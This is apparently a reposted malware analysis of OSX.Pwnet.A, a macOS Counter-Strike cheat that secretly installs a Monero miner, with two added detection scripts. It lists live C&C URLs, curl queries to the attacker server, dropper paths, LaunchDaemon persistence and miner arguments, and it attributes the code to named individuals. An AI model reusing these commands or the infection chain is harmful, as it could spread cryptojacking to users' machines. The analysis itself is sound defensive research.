OSX.Pwnet.A

a guest
Aug 24th, 2017

OSX.Pwnet.A – CS: GO Hack and Sneaky Miner
By Arnaud Abbati - August 23, 2017

(Photo source: Pony Strike: Global Offense by FilipinoNinja95)

We recently found a hack for Counter-Strike: Global Offensive on macOS that is also a trojan that could mine cryptocurrencies without user consent.

According to VirusTotal Retrohunt, the threat has been in the wild since the beginning of July 2017.

Warning: At the time of this writing, all URLs are live.

vlone.cc
The entry point is the vlone.cc portal, where a user can Register, Login and Download the hack installer for free.

The domain name was registered through eNom on April 14, 2017, and resolves to a shared web host at Namecheap:

$ dig vlone.cc +short
198.54.115.80
$ dig -x 198.54.115.80 +short
server205-2.web-hosting.com.

The HTTPS certificate was issued by COMODO PositiveSSL on June 27, 2017.

When logged in, members can browse the Prices page and purchase a premium subscription for 1, 3 or 6 months through Selly.

Members download the same archive of the free installer as guests:

$ curl -s https://vlone.cc/portal/download.php | shasum -a 256
b1bdb4502f5051309582f72a62c14d9919d3c86de3dcfa0b3a5f008cb5a018fe -
$ curl -s https://vlone.cc/portal/download.php -G -d user=1234 -d free | shasum -a 256
b1bdb4502f5051309582f72a62c14d9919d3c86de3dcfa0b3a5f008cb5a018fe -

According to the user GET query value, the member count as of August 22, 2017 is nearly two thousand.

We don’t know if the private installer of the hack also installs the mining software without user consent.

Binaries analysis
It’s all C++ Standard Library code. Network connections use libcurl and the secure HTTPS protocol.

All executables except the miner CLI require super-user privileges, so the user must run the installer with sudo:

$ ./vHook
Root access required!
Please type "sudo ./vhook"

The main binary disguises itself as Dynamic Web TWAIN, an online document scanning platform.

vHook

vHook is the installer. It is packed with UPX, probably to avoid user analysis and bypass some security products.

It is a command line interface:

$ sudo ./vHook
[vlone] vHook public [vlone]
Username: USERNAME
Password: PASSWORD
[vlone] Welcome to vHook Public, USERNAME!
[vlone] Downloading vHook assets..
[vlone] Inflating vHook assets..
[vlone] CS:GO is not running!
[vlone] Cleaning up..
[vlone] Quitting...

With a valid member account, it downloads and extracts bootstrap.dylib and vhook.dylib from https://vlone.cc/portal/gateway.php as assets.zip to /Library/Application Support/:

$ curl -s https://vlone.cc/portal/gateway.php -G -d username=USERNAME -d password=PASSWORD -d free | xxd -l 64
00000000: 504b 0304 1400 0000 0800 8696 c14a 9c2e PK...........J..
00000010: 55c2 b606 0000 1827 0000 0f00 1c00 626f U......'......bo
00000020: 6f74 7374 7261 702e 6479 6c69 6255 5409 otstrap.dylibUT.
00000030: 0003 9cb9 2f59 d339 8059 7578 0b00 0104 ..../Y.9.Yux....

It loads bootstrap.dylib from the osxinj project. If Counter-Strike: Global Offensive is running, it downloads and extracts some fonts (https://vlone.cc/fontfix.zip as vlone.zip to /Library/Fonts/), and injects vhook.dylib into the csgo_osx64 process.

It could be a perfect deal for a CS: GO user, but it turns out vHook also sneakily downloads and extracts https://vlone.cc/abc/assets/asset.zip as fonts.zip to /var/, changes directory to /var and runs sudo ./helper &.

It then kills the Terminal application to hide the detached process output.

helper

helper is the dropper for the miner downloader. It is also packed with UPX.

It first asks the C&C server for the name of the binary to execute upon download:

$ curl https://www.vlone.cc/abc/commands/update.php?request -F command=newfile
com.dynamsoft.webhelper

It downloads https://www.vlone.cc/abc/assets/b.zip as /b.zip, extracts its contents to /var/.log/, changes directory to /var/.log/ and runs sudo ./com.dynamsoft.WebHelper &.

At the time of this writing, the https://www.vlone.cc/abc/assets/b.zip URL returns a File Not Found 404 error, but the https://www.vlone.cc/abc/assets/bz.zip URL is live and sends the expected archive.

com.dynamsoft.WebHelper

com.dynamsoft.WebHelper is the miner downloader. Despite the name, it is not related to Dynamsoft.

It starts by downloading and extracting:

- WebTwainService from https://www.vlone.cc/abc/assets/d.zip to /var/.log/
- com.dynamsoft.WebTwainService.plist from https://www.vlone.cc/abc/assets/p.zip to /Library/LaunchDaemons/

It loads the daemon, sends the computer's unique identifier (UUID) and its version to the C&C server, and checks whether it meetsRequirements(), i.e. running as root and not in a debugger:

$ curl -s https://www.vlone.cc/abc/hub.php?init -F version=1.2.1 -F hwid=$(uuidgen)
created continue

It then sleeps for one hour. Anyone in a hurry can easily cut the nap short:

__text:0000000100016A5F BF 01 00 00 00 mov edi, 1800 ; unsigned int
__text:0000000100016A64 E8 5B 72 00 00 call _sleep

Once rested, it sends commands to the C&C server every minute to ask if it should mine and update or kill itself:

$ curl -s https://www.vlone.cc/abc/commands/mine.php?request -F command=mine
true
$ curl -s https://www.vlone.cc/abc/commands/update.php?request -F command=update
false
$ curl -s https://www.vlone.cc/abc/commands/kill.php?request -F command=kill
false

Every minute, it also creates or updates the mining thread to:

- download and extract https://www.vlone.cc/abc/assets/helper.zip to /var/.trash/.assets/
- get miner settings (maximum core number, currency, email address)
- check if Activity Monitor is running
- check if it is already mining
- check if it should stop mining
- run cd /var/.trash/.assets/; ./com.apple.SafariHelper with appropriate arguments

WebTwainService

WebTwainService tries to take care of com.dynamsoft.webhelper persistence. It is again packed with UPX.

It sets its current directory to /var/.log and runs sudo ./com.dynamsoft.webhelper &, then recursively sleeps for one hour…
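
The miner chain described so far leaves a small, fixed set of paths on disk. The following sweep is an added example, not part of the original analysis; the function name `pwnet_sweep` and the root argument are assumptions, while every path in the list is taken from the text above.

```sh
#!/bin/sh
# Added example (not from the original write-up): list the files and hidden
# directories this analysis says the miner chain creates. Pass a root other
# than / to sweep a mounted disk image or a test tree.

# "directory|name" pairs, all taken from the article text above.
PWNET_ARTIFACTS='/|b.zip
/var|helper
/var|fonts.zip
/var|.log
/var|.trash
/var/.log|com.dynamsoft.WebHelper
/var/.log|WebTwainService
/var/.trash/.assets|com.apple.SafariHelper
/Library/LaunchDaemons|com.dynamsoft.WebTwainService.plist'

pwnet_sweep() {
    root=${1%/}    # "/" becomes "", so "$root/var" is correct for both cases
    printf '%s\n' "$PWNET_ARTIFACTS" | while IFS='|' read -r dir name; do
        [ -d "$root$dir" ] || continue
        # -iname: the C&C answered "com.dynamsoft.webhelper" in lower case,
        # and a case-sensitive volume would keep that spelling on disk.
        find "$root$dir" -maxdepth 1 -iname "$name" 2>/dev/null || :
    done
}

# Sweep the live system unless another root is given; no output means no hits.
pwnet_sweep "${1:-/}"
```

Run it with sudo on a live system, since the directories under /var are created by root.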

minergate-cli

com.apple.SafariHelper is actually the official MinerGate CLI v4.04:

$ shasum -a 256 MinerGate-cli-4.04-Mac/minergate-cli com.apple.SafariHelper
b943369a2ae7afb3522f3b1c40c15208bff0444d47d0df476dd585cf9cbf7c10 MinerGate-cli-4.04-Mac/minergate-cli
b943369a2ae7afb3522f3b1c40c15208bff0444d47d0df476dd585cf9cbf7c10 com.apple.SafariHelper

It is written in Qt, so it comes with frameworks:

$ find /private/.trash -type f
/private/.trash/.assets/com.apple.SafariHelper
/private/.trash/.assets/Frameworks/QtCore.framework/Versions/5/QtCore
/private/.trash/.assets/Frameworks/QtNetwork.framework/Versions/5/QtNetwork
/private/.trash/.assets/Frameworks/QtSql.framework/Versions/5/QtSql
/private/.trash/.assets/Frameworks/QtWebSockets.framework/Versions/5/QtWebSockets

It takes as much CPU as requested by com.dynamsoft.WebHelper, so the user enjoys the delight of the computer’s fans as background music:

$ ps axu | grep [c]om.apple.SafariHelper
root 474 200.0 0.2 2490592 14204 s000 R+ 3:07AM 3:21.87 ./com.apple.SafariHelper -user pwnedboi@protonmail.com --xmr 2

In this example, it is mining Monero (XMR) with all virtual machine cores (two: 200.0%).
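
Because the miner is the stock MinerGate CLI under a borrowed name, matching on the file name alone misses a renamed copy. The following is an added example, not part of the original analysis: it matches the argument shape seen in the ps line above instead. The function name `find_minergate_cli` and all sample rows except the first are constructed.

```sh
#!/bin/sh
# Added example (not from the original write-up): find MinerGate CLI
# invocations in `ps axu` output by argument shape rather than file name.

# Constructed sample. Row 1 is the ps line quoted above; row 2 is the same
# CLI under a made-up name; rows 3-4 are benign look-alikes.
SAMPLE_PS='root 474 200.0 0.2 2490592 14204 s000 R+ 3:07AM 3:21.87 ./com.apple.SafariHelper -user pwnedboi@protonmail.com --xmr 2
root 901 99.8 0.2 2490592 14100 ?? R 4:10AM 1:02.10 ./updater -user miner@example.invalid --xmr 1
alice 612 1.3 0.9 4512340 81200 ?? S 3:01AM 0:04.11 /usr/local/bin/backup -user alice@example.invalid --verbose
alice 700 0.0 0.1 2432784 1024 s001 S+ 3:09AM 0:00.01 grep SafariHelper'

# Reads ps axu rows on stdin; prints PID, owner, %CPU, executable, account,
# coin and core count (tab-separated) for each match.
find_minergate_cli() {
    awk '{
        acct = ""; coin = ""; cores = ""
        for (i = 12; i <= NF; i++) {          # field 11 is the executable
            if ($i == "-user" && $(i + 1) ~ /@/) acct = $(i + 1)
            if ($i ~ /^--[a-z]+$/ && $(i + 1) ~ /^[0-9]+$/) {
                coin = substr($i, 3); cores = $(i + 1)
            }
        }
        if (acct != "" && coin != "")
            printf "%s\t%s\t%s\t%s\t%s\t%s\t%s\n", $2, $1, $3, $11, acct, coin, cores
    }'
}

# Demo on the constructed sample; on a live host use: ps axu | find_minergate_cli
printf '%s\n' "$SAMPLE_PS" | find_minergate_cli
```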

The current MinerGate email address is pwnedboi@protonmail.com; the address xxanax420@gmail.com was also found hardcoded in another sample.

Maximum core number, cryptocurrency and email address are provided by com.dynamsoft.WebHelper and the C&C server:

$ curl -s https://www.vlone.cc/abc/commands/mine.php?request -F mine=cores
4
$ curl -s https://www.vlone.cc/abc/commands/mine.php?request -F mine=coin
xmr
$ curl -s https://www.vlone.cc/abc/commands/mine.php?request -F mine=email
pwnedboi@protonmail.com

Finn and ponies
We didn’t spend too much time reverse engineering vhook.dylib. The source code is available on GitHub and videos of the hack are also available on YouTube here and there.

The GitHub owner of the vHook project is fetusfinn (the original author is ViKiNG), and we coincidentally found debugger symbols matching the Finn username in GitHub’s libvHook.dylib and in all analyzed binaries:

$ for f in github.com/fetusfinn/vHook/libvHook.dylib \
    vHook_unpacked helper_unpacked com.dynamsoft.WebHelper WebTwainService_unpacked
do
    nm -a "$f" | grep -m 1 Finn
done
0000000000000000 - 00 0000 SO /Users/Finn/Desktop/c++/vHook/
0000000000000000 - 00 0000 SO /Users/Finn/Downloads/Archive/vloneLoader/
0000000000000000 - 00 0000 SO /Users/Finn/Desktop/pwnednet/pwnednet/installer/installer/
0000000000000000 - 00 0000 SO /Users/Finn/Desktop/pwnednet/pwnednet/pwnednet/
0000000000000000 - 00 0000 SO /Users/Finn/Downloads/WebTwainService/WebTwainService/WebTwainService/

This is how we know Finn’s project name is pwnednet. Shortened to pwnet, it sounds like poney in French, i.e. pony in English, and everybody loves ponies, so here you have OSX.Pwnet.A!

There is also a reference to someone named Jennifer Johansson in the Xcode user data:

$ find github.com/fetusfinn/vHook -type f -path "*nnif*"
github.com/fetusfinn/vHook/vHook.xcodeproj/xcuserdata/jenniferjohansson.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist
github.com/fetusfinn/vHook/vHook.xcodeproj/xcuserdata/jenniferjohansson.xcuserdatad/xcschemes/vHook.xcscheme
github.com/fetusfinn/vHook/vHook.xcodeproj/xcuserdata/jenniferjohansson.xcuserdatad/xcschemes/xcschememanagement.plist

We didn’t take the time to ask pwned’s boyfriend on Discord if Finn is much into ponies.

But, just in case, here is a Dutch Pony for Finn and her team.

From Hackestria with ❤️